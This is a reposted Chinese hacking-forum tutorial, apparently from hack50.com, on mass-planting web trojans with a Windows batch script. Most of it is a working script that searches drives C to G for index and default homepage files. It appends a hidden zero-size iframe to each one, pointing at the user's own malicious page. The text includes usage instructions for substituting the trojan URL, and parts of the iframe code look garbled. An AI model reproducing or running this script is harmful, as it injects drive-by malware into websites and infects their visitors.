（转）批处理挂木马的方法

这个是转载（批处理挂马）

以前在网上发现了一个批量对网站首页加入挂马代马的软件,就有想法用批处理实现此功能
今天学了点批处理,刚好就想出来了,不是很完善,还是那句话...以后在改
利用forfiles这个命令可以简单实现
例如:
forfiles /p d:\ /m index.asp /s /c "cmd.exe /c if @isdir==FALSE echo 代码 >>@path"
/p d:\ 表示搜索D盘 /m
/m index.asp 表示在D盘下搜索文件名为index.asp的文件
/s 搜索D盘下所有的文件夹
/c 这里是搜索到文件后执行的命令这是我执行的是if @isdir==FALSE echo 代码 >>@path
其中@isdir是forfiles的一个参数表示搜索到的index.asp是文件时返回FALSE(这里一定要大写不然无法成功)
@path也是一个参数,表示获取该文件的绝对路尽
这个只实现对一个文件名搜索,不能搜索搜索多个,哪位知到请指教

下面给出一个完整的对指定主页名进行加入挂马代码的批处理
请注意里面的说名

@echo off
echo           欢迎使用批量插入代码批处理
echo           编写人：伤脑筋 2005-11-7
echo.
echo             注意↓注意↓注意↓注意↓
echo 复制本批处理前请将记事本的自动换行功能取消！否则将无法插入代码。
echo         然后请按下Ctrl+h键打开记事本替换功能！
echo         将“查找内容”键入"马儿"(双引号不要)
echo   将"替换为"键入"您自己网马的地址(如:www.snj.com/muma.htm)"
echo         切记不需要输入"http://"不然格式就了拉
echo               退出批处理请按Ctrl+c
:st
echo.
echo 第一步:请选择您需要进搜索的盘符号(如c盘选"c")."h"选项为帮助信息.
echo.
choice /c cdefgh /m c为C盘,d为D盘,e为E盘,f为F盘,g为G盘,h为帮助.
if errorlevel 6 goto h
if errorlevel 5 goto g
if errorlevel 4 goto f
if errorlevel 3 goto e
if errorlevel 2 goto d
if errorlevel 1 goto c
:c
echo.
echo 第二步:请选择要在"C"盘搜索要插入代码的主页名(只提供6种).例如(主页名为index.asp就选a)
echo.
choice /c sabcdef /m a为(index.asp),b为(index.htm)c为(index.html),d为(default.asp),e为

(default.htm),f为(default.html),"s"为返回上一及选项。
if errorlevel 7 goto dhtml
if errorlevel 6 goto dhtm
if errorlevel 5 goto dasp
if errorlevel 4 goto ihtml
if errorlevel 3 goto ihtm
if errorlevel 2 goto iasp
if errorlevel 1 goto st
:dhtml
forfiles /p c:\ /m default.html /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto c
:dhtm
forfiles /p c:\ /m default.htm /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto c
:dasp
forfiles /p c:\ /m default.asp /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto c
:ihtml
forfiles /p c:\ /m index.html /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto c
:ihtm
forfiles /p c:\ /m index.htm /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto c
:iasp
forfiles /p c:\ /m index.asp /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto c
:d
echo.
echo 第二步:请选择要在"d"盘搜索要插入代码的主页名(只提供6种).例如(主页名为index.asp就选a)
echo.
choice /c sabcdef /m a为(index.asp),b为(index.htm)c为(index.html),d为(default.asp),e为

(default.htm),f为(default.html),"s"为返回上一及选项。
if errorlevel 7 goto dhtml
if errorlevel 6 goto dhtm
if errorlevel 5 goto dasp
if errorlevel 4 goto ihtml
if errorlevel 3 goto ihtm
if errorlevel 2 goto iasp
if errorlevel 1 goto st
:dhtml
forfiles /p d:\ /m default.html /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto d
:dhtm
forfiles /p d:\ /m default.htm /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto d
:dasp
forfiles /p d:\ /m default.asp /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto d
:ihtml
forfiles /p d:\ /m index.html /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto d
:ihtm
forfiles /p d:\ /m index.htm /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto d
:iasp
forfiles /p d:\ /m index.asp /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto d
:e
echo.
echo 第二步:请选择要在"e"盘搜索要插入代码的主页名(只提供6种).例如(主页名为index.asp就选a)
echo.
choice /c sabcdef /m a为(index.asp),b为(index.htm)c为(index.html),d为(default.asp),e为

(default.htm),f为(default.html),"s"为返回上一及选项。
if errorlevel 7 goto dhtml
if errorlevel 6 goto dhtm
if errorlevel 5 goto dasp
if errorlevel 4 goto ihtml
if errorlevel 3 goto ihtm
if errorlevel 2 goto iasp
if errorlevel 1 goto st
:dhtml
forfiles /p e:\ /m default.html /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto e
:dhtm
forfiles /p e:\ /m default.htm /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto e
:dasp
forfiles /p e:\ /m default.asp /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto e
:ihtml
forfiles /p e:\ /m index.html /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto e
:ihtm
forfiles /p e:\ /m index.htm /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto e
:iasp
forfiles /p e:\ /m index.asp /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto e
:f
echo.
echo 第二步:请选择要在"f"盘搜索要插入代码的主页名(只提供6种).例如(主页名为index.asp就选a)
echo.
choice /c sabcdef /m a为(index.asp),b为(index.htm)c为(index.html),d为(default.asp),e为

(default.htm),f为(default.html),"s"为返回上一及选项。
if errorlevel 7 goto dhtml
if errorlevel 6 goto dhtm
if errorlevel 5 goto dasp
if errorlevel 4 goto ihtml
if errorlevel 3 goto ihtm
if errorlevel 2 goto iasp
if errorlevel 1 goto st
:dhtml
forfiles /p f:\ /m default.html /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto f
:dhtm
forfiles /p f:\ /m default.htm /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto f
:dasp
forfiles /p f:\ /m default.asp /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto f
:ihtml
forfiles /p f:\ /m index.html /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto f
:ihtm
forfiles /p f:\ /m index.htm /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto f
:iasp
forfiles /p f:\ /m index.asp /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto f
:g
echo.
echo 第二步:请选择要在"g"盘搜索要插入代码的主页名(只提供6种).例如(主页名为index.asp就选a)
echo.
choice /c sabcdef /m a为(index.asp),b为(index.htm)c为(index.html),d为(default.asp),e为

(default.htm),f为(default.html),"s"为返回上一及选项。
if errorlevel 7 goto dhtml
if errorlevel 6 goto dhtm
if errorlevel 5 goto dasp
if errorlevel 4 goto ihtml
if errorlevel 3 goto ihtm
if errorlevel 2 goto iasp
if errorlevel 1 goto st
:dhtml
forfiles /p g:\ /m default.html /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto g
:dhtm
forfiles /p g:\ /m default.htm /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto g
:dasp
forfiles /p g:\ /m default.asp /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto g
:ihtml
forfiles /p g:\ /m index.html /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto g
:ihtm
forfiles /p g:\ /m index.htm /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto g
:iasp
forfiles /p g:\ /m index.asp /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
rem 注意！如果您在复制时上面一行命令不是处在一行，请自行换成一行。
echo 出现错误提示是因为被写入文件路径是一个文件夹名
echo 命令已经执行完毕~恭喜代码全部插入。。。
echo 回车后将返回上及菜单
pause
goto g
:h
echo 使用方法很简单！但在告诉您使用前先请您注意几个地方
echo 1:复制本批处理前请将记事本的自动换行功能取消,因为关键命令必须要是一行才能执行。
echo 2:请按下Ctrl+h键打开记事本替换功能！将“查找内容”键入"马儿"(双引号不要)
echo   将"替换为"键入"您自己网马的地址(如:www.snj.com/muma.htm)"
echo   切记切记不需要输入"http://"因为命令里已经输入了一个
echo 3:使用方法...
echo   在您看清楚需要注意的地方并且将网马地址替换后
echo   首先选择一个您要查找主页文件的磁盘名(如“C”盘就按C)
echo   然后根据提示再选择您要在此盘中搜索的主页文件名字(如"index.asp"选a)
echo   完成以上两步您就可以等待成功提示了！速度根据磁盘文件内容多少而定
echo 4:本批处理没使用变量，所以使用面很单一。（主要是为了能在一个批处理完成）
echo   哪位要是写出用变量代替可选项的批处理记得加我QQ留个言给我
echo   QQ:447228437 （一定要留言啊）
echo 5:回车将跳主选项
pause
goto st

将以上代码复制放到记事本保存,在将记事本的扩展名改为.bat运行就可以了
注意复制前要把记事本的"自动换行"功能去掉,否则会出错
还有本人刚发现如果直接在网页复制这行关键代码
forfiles /p g:\ /m index.asp /s /c "cmd.exe /c if @isdir==FALSE echo ^</html^>^<iframe

src=\'#\'" //马儿" name="zhu" width="0" height="0" frameborder="0"^> >>@path"
会在记事本里如上面那样显示,如果不把他改成一行的话批处理是无法运行的
所以我把批处理存为.jpg的图片格式又保存在网上了
大家访问下面的图片地址后全选网页,在复制,然后在粘贴在记事本里格式就对了,改为BAT运行就行了,如果还不能运行那就是你在复制前没把记事本的"自动换行"功能去掉

本文转自: 黑客武林(www.hack50.com) 详细出处参考：http://www.hack50.com/stu/sort091/sort0103/35923.html